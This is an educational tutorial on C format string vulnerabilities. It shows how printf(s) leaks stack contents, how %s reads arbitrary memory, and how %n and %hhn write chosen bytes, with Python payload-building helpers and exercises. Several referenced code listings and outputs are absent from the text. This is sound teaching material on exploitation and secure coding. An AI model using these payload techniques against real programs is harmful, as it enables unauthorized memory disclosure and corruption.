Format strings

We now study another classic program exploitation technique. A format string is a string containing format directives, such as the %d and %s directives of printf. These directives are interpreted and replaced with the values of the corresponding arguments. For example, a call such as printf("r = %d\n", r) substitutes %d with the value of the integer variable r and prints the resulting string.

A classic mistake is to print a string s directly, as in printf(s), without specifying a format. A string should always be printed through an explicit "%s" format, as in printf("%s", s).

Consider now the following piece of code, where the string buffer is printed directly, without specifying a format "%s":

Printing a string this way is a security vulnerability: if we provide, as input, strings containing format directives, these will be interpreted and will leak (and possibly modify) memory values. We show some examples below.

First notice that the compiler raises a security warning about the direct printf of a string. Programmers should always take this warning seriously and fix the issue.

Let us now analyse what is happening. The call to printf in the program interprets %08x as a format directive and prints, in hexadecimal and padded with zeros to 8 digits, the first argument after the format string. The problem is that no such argument was passed! The printf function nevertheless looks for it on the stack of the calling function, since on 32-bit x86 parameters are pushed on the stack just before a function is called, as depicted below:

saved ebp (calling function)
return address (calling function)
first parameter
second parameter
….

So, if we keep adding format directives we can print the whole stack of the calling function. Since the string we are printing is stored on the stack in the buffer array, if we print enough words we will sooner or later find it. A trick to spot the string immediately is to prepend an easily recognizable pattern such as the “classic” AAAA (41414141 in hexadecimal), as shown in the following example:

It is easy to see the word containing 41414141, which is the beginning of our string.
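The search for the marker can also be automated. The following is a minimal Python sketch, not part of the original program: the helper names probe_payload and marker_position are hypothetical, and the sample output is made up for illustration, assuming the words are printed separated by dots.

```python
def probe_payload(count, marker="AAAA"):
    """Marker followed by `count` dot-separated %08x directives."""
    return marker + ".%08x" * count


def marker_position(output, marker="AAAA"):
    """Return the 1-based position of the word holding `marker`, or None."""
    # On little-endian x86 the bytes "AAAA" read back as the word 41414141.
    target = format(int.from_bytes(marker.encode(), "little"), "08x")
    words = output.strip().split(".")[1:]  # drop the echoed marker itself
    for position, word in enumerate(words, start=1):
        if word == target:
            return position
    return None


# Hypothetical program output, made up for illustration only.
sample_output = "AAAA.00000100.f7fb25a0.00000000.00000000.00000001.ffffd5a4.41414141"
print(probe_payload(7))
print(marker_position(sample_output))
```

If the marker is not found, the probe can simply be repeated with a larger count.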

Direct access to parameters

Once we know the position on the stack (in this case it is the seventh word on the stack) we can refer directly to the corresponding parameter as follows:

The format %7$08x is like %08x but instead of printing the next parameter on the stack it prints the one specified before the dollar symbol, the seventh in this case. We can also print the same parameter more than once:
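To make the difference between sequential and direct access concrete, here is a toy Python model of how the directives select words. It is only a sketch: toy_printf is a hypothetical helper that understands nothing but %x-style directives, and the stack words are made-up values, chosen so that the seventh one holds AAAA.

```python
import re

# Hypothetical stack words (made-up values); the seventh holds "AAAA".
STACK_WORDS = [0x00000100, 0xf7fb25a0, 0x00000000, 0x00000000,
               0x00000001, 0xffffd5a4, 0x41414141]

# Matches %x, %8x, %08x and the positional forms such as %7$08x.
DIRECTIVE = re.compile(r"%(?:(\d+)\$)?(0?)(\d*)x")


def toy_printf(fmt, words):
    """Expand %x-style directives against `words`; a model, not real printf."""
    out, pos, next_index = [], 0, 0
    for match in DIRECTIVE.finditer(fmt):
        out.append(fmt[pos:match.start()])
        direct, zero, width = match.groups()
        if direct:
            # %N$x: pick the N-th word directly.
            word = words[int(direct) - 1]
        else:
            # %x: take the next word in sequence.
            word = words[next_index]
            next_index += 1
        text = format(word, "x")
        if width:
            text = text.rjust(int(width), "0" if zero else " ")
        out.append(text)
        pos = match.end()
    out.append(fmt[pos:])
    return "".join(out)


print(toy_printf("AAAA.%08x.%08x", STACK_WORDS))
print(toy_printf("AAAA.%7$08x", STACK_WORDS))
print(toy_printf("%7$08x.%7$08x", STACK_WORDS))
```

In this model the positional form reads the same word every time, whereas each plain %08x advances to the next one.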

Exercise

Try to reveal the content of the PIN array (containing a secret PIN) through a format string attack. Hint: Since the array is allocated on the stack, use %x and not %s.

Printing arbitrary memory locations

Now that we know where our string is located on the stack we can do more. The format directive %s is used to print strings: the corresponding parameter on the stack is interpreted as the address of a string, and the string it points to is printed (the pointer is dereferenced!). This allows us to print a string at an arbitrary memory location: we replace AAAA with the target address and we place a %s in the format string at the position corresponding to the 41414141 output. This will interpret our address as a pointer to a string and will print the string starting at that address.
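A payload of this shape could be assembled as in the following Python sketch. The helper name leak_string_payload is hypothetical. The position 7 is the one found above, while the address 0x08048640 is the one reported later in the text for one particular build; both must be determined again for any other binary.

```python
import struct


def leak_string_payload(address, position):
    """Little-endian address followed by a positional %s directive."""
    packed = struct.pack("<I", address)  # 32-bit little-endian, as on x86
    if b"\x00" in packed:
        # A NUL byte would end the format string before the directive.
        raise ValueError("address contains a NUL byte")
    return packed + f"%{position}$s".encode()


payload = leak_string_payload(0x08048640, 7)
print(payload)
```

The resulting bytes are meant to be fed to the vulnerable program as input. The NUL check is there because printf stops reading the format string at the first zero byte.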

Exercise

Consider the following program and try to print the supersecret string using the technique discussed above.

Notice that the string is NOT on the stack, thus it would never be printed by increasing the number of %x directives in the format string.

Hint: You can use objdump -D and/or gdb to find the string address.

The following video illustrates the solution (try it yourself before watching):

Writing with format strings

So far, we have seen how to print the content of arbitrary memory locations. There also exist format directives that modify memory, and we can try to exploit them to change the content of a memory address. In particular, we illustrate the %n directive, which stores the number of bytes written so far by printf into the integer variable pointed to by the corresponding argument. Try the following example:

We obtain the following output:

Using echo and wc we can double check that 40 and 87 are, in fact, the number of bytes written up to the point where the two %n are placed:
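The same kind of count can be reproduced with a small Python model of %n. This is only a sketch: n_counts is a hypothetical helper that handles literal text, %% and %n but no other directive, and the sample string is made up rather than taken from the example above.

```python
def n_counts(fmt):
    """Return the byte count that each %n in `fmt` would store."""
    counts = []
    written = 0
    i = 0
    while i < len(fmt):
        if fmt.startswith("%n", i):
            counts.append(written)  # %n stores the count and prints nothing
            i += 2
        elif fmt.startswith("%%", i):
            written += 1            # %% prints a single percent sign
            i += 2
        else:
            written += 1            # ordinary character, printed as is
            i += 1
    return counts


print(n_counts("hello%n world%n"))  # [5, 11]
```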

Consider our previous example modified as follows:

It prints the address, the string and the first four bytes of the string in hexadecimal notation, before and after the input of the format string (i.e., where the format string attack happens):

We now know the address of the string 0x08048640 and we can easily reproduce the attack that leaks the supersecret string on this particular code:

Now, if we replace %s with %n in the attack we should, in principle, be able to write on the string.

It did not work: we get a segmentation fault instead! To understand what is happening, we examine the program sections with objdump -h:

Our string is in the read-only section .rodata, which spans from address 0x08048620 to address 0x080486c2 (0x08048620 + 0xa2); hence the segmentation fault. In fact, we are declaring the variable as

which is a constant char array. We need to remove the const modifier to make it writable:

Now the variable is in a read-write segment .data. In fact, the elements of an array should be modifiable:

We try again to write on the string:

We did it! The first byte of the string now holds 0x05, the number of bytes written before the %11$n: the four bytes of the address \x40\xa0\x04\x08 plus the dot.

Notice that by declaring the variable as

we would also get a segmentation fault error as, in this case, the string would be stored into the read-only section and only the pointer to it, named supersecret, would be modifiable.

Writing something useful

The technique becomes interesting if we can control what we write. An easy way to do this is to use a directive such as %100x, which writes at least 100 characters (the output is padded with spaces as needed to reach a width of 100). So if we want to write 0xbeef we can compute 0xbeef - 0x4 = 48875 and add a %48875x directive before the %11$n, so that the number written will be 48875 + 4 (the four bytes of the address). Let’s try it:
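The arithmetic and the resulting payload can be sketched in Python as follows. The helper name single_write_payload is hypothetical. The address 0x0804a040 and the position 11 are the values used in the text for this particular build, and would differ for another binary.

```python
import struct


def single_write_payload(address, value, position):
    """Address, then padding so that %n stores `value` at that address."""
    packed = struct.pack("<I", address)   # 4 bytes already printed
    width = value - len(packed)           # remaining bytes to print
    if width < 8:
        # %Nx is a minimum width: a word with more hex digits than N
        # would print more than N characters and spoil the count.
        raise ValueError("value too small for this simple scheme")
    return packed + f"%{width}x%{position}$n".encode()


payload = single_write_payload(0x0804a040, 0xbeef, 11)
print(payload)
```

With these values the padding directive is %48875x, in agreement with the computation above.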

It worked! We have written 0xbeef on the two least significant bytes of the word. Notice, however, that the printed output is very long (0xbeef = 48879 bytes, in fact). We can make the attack much shorter by writing byte by byte, as shown in the following example.

Example

We show how to write 0xfeedbeef byte by byte little-endian as 0xef 0xbe 0xed 0xfe.

To write four bytes we can put the four addresses one after the other and refer to them using the direct parameter access trick above. We also use the hh modifier before the n to indicate that we are writing a half-half-word, i.e., a single byte.

Good! We have written 0x10, which is 16 in decimal, on each of the four bytes. In fact, the payload now starts with 4 addresses of 4 bytes each, which gives 16 written bytes, so each of the four hhn directives writes 16 to its address.

To write 0xef 0xbe 0xed 0xfe we now have to compute how much padding we need to insert before the respective hhn directives.
We start from the first byte. We can do the math in a Python shell as follows:
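A minimal version of this computation, written as a short script rather than an interactive session, might look like this (the variable names are only illustrative):

```python
already_written = 4 * 4   # four 4-byte addresses at the start of the payload
first_byte = 0xef         # least significant byte of 0xfeedbeef

width = first_byte - already_written
print(width)  # 223
```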

We thus add a %223x directive before the %11$hhn:

It works! We have written 0xef on the four bytes. We can now go on computing the padding to write the second byte.

Uh! The second byte is supposed to be 0xbe which is less than 0xef. No problem. We observe that in order to write 0xbe we can in fact write 0x1be since the hhn directive will only write one byte, i.e., 0xbe.

Thus for the following three bytes we have:
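The wrap-around reasoning generalizes to any sequence of bytes. The following Python sketch uses a hypothetical helper, hhn_widths, which computes each padding modulo 256. It also adds 256 to any padding below 8, on the assumption that the padding directive prints a 32-bit word, which can take up to 8 hexadecimal digits.

```python
def hhn_widths(target_bytes, already_written):
    """Padding widths so that successive %hhn writes store `target_bytes`."""
    widths = []
    written = already_written
    for target in target_bytes:
        # Only the low byte of the count is stored, so work modulo 256.
        delta = (target - written) % 256
        if delta < 8:
            # A width below 8 could be exceeded by the printed word itself.
            delta += 256
        widths.append(delta)
        written += delta
    return widths


print(hhn_widths([0xef, 0xbe, 0xed, 0xfe], 16))  # [223, 207, 47, 17]
```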

Now we can directly add %207x, %47x, %17x before %12$hhn, %13$hhn, %14$hhn, respectively.

Good, we did it!

Exercise 1

Write 0xdeadbeef on the four bytes of the string.

Exercise 2

Write 0xdeadbeef again, this time using the hn directive, which writes a half-word, i.e., 2 bytes. In this variant you only need two %hn directives and the addresses of the two half-words.

Exercise 3

Write “beef” at the beginning of the string so as to overwrite “This”. Try also to terminate the string right after “beef”.
